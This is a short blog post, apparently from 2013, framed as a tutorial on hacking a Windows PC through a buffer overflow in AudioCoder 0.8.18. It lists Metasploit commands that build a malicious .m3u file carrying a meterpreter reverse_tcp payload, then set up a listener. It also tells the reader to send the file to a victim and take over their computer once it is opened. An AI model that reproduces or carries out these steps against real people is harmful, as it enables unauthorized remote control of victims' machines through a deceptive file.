Tuesday, 1 October 2013

Hack Windows PC using audiocoder


AudioCoder .M3U Buffer Overflow
This module exploits a buffer
overflow in Audio Code 0.8.18.
The vulnerability occurs when
adding an .m3u, allowing
arbitrary code execution with the
privileges of the user running
AudioCoder. This module has
been tested successfully on
AudioCoder 0.8.18.5353 over
Windows XP SP3 and Windows 7
SP1.
Exploit Targets
Audio Code 0.8.18
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal
type msfconsole
Now type use exploit/windows/
fileformat/audio_coder_m3u
msf exploit (audio_coder_m3u)
>set payload windows/
meterpreter/reverse_tcp
msf exploit (audio_coder_m3u)
>set lhost 192.168.1.3 (IP of
Local Host)
msf exploit (audio_coder_m3u)
>exploit
After we successfully generate
the malicious m3u File, it will
stored on your local computer
/root/.msf4/local/msf.m3u
Now we need to set up a listener
to handle reverse connection
sent by victim when the exploit
successfully executed.
use exploit/multi/handler
set payload windows/
meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send your msf.m3u files to
victim, as soon as they download
and open it. Now you can access
meterpreter shell on victim
computer. 

No comments:

Masala FM

Free Shoutcast HostingRadio Stream Hosting